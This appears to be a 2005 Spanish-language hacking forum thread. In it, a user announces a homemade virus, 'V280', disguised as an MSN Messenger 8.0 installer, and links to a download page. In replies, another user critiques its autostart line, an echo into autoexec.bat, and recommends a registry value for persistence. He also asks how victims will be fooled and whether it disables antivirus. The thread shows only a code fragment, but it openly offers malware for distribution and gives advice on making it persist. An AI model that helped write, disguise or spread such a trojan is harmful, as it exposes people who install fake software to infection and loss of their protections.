.:Victoric:.
Colaborador

S13mpr3 h4y 4lgu13n m1r4nd0
|
 |
« en: Octubre 11, 2005, 11:17:55 » |
|
Ya tengo hecho el nuevo virus V280 que lleva el sobre nombre de Msn Messenger 8.0 y lo que hace lo podeis ver en el LEEME que es lo priemero que teneis que leer. Para descargarlo meteros en mi pag. Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesionhttp://usuarios.lycos.es/victoricinc/ Descargar el Msn Messenger 8.0
|
|
|
|
|
|
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion"El sabio dijo una vez "Primero probamos despues atacamos..."
|
|
|
|
|
|
|
kAmall
Visitante
|
 |
« Respuesta #3 en: Octubre 11, 2005, 11:46:45 » |
|
me tira error
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
kAmall
Visitante
|
 |
« Respuesta #9 en: Octubre 11, 2005, 12:02:20 » |
|
bueno ahora estoy viendo el source y parece que queres que se inicie junto a windows. es verdad? pero si es asi, te haz confundido porke haz puesto echo @echo off>>autoexe.bat y aparte no funciona con el autoexeC. si queres que se inicie junto a windows crea un valor en el registro.
|
|
|
|
|
|
|
|
|
|
|
kAmall
Visitante
|
 |
« Respuesta #11 en: Octubre 11, 2005, 12:09:18 » |
|
y por ultimo tengo 2 preguntas. la primera. puedes explicar porq se creera que se le instala el msn 8
yo tengo la misma duda, porque la "victima" se creera que se le instala el msn8. no creo que la victima sea tan estupida, jeje. y mi segunda pregunta .. tu programa se hace pasar por un instalador de msn y a la vez le elimina el antivirus y se carga al inicio? esa es la funcion del programa? PD: y porque se llama V280 ?
|
|
|
|
|
|
|
|
|
|
|
|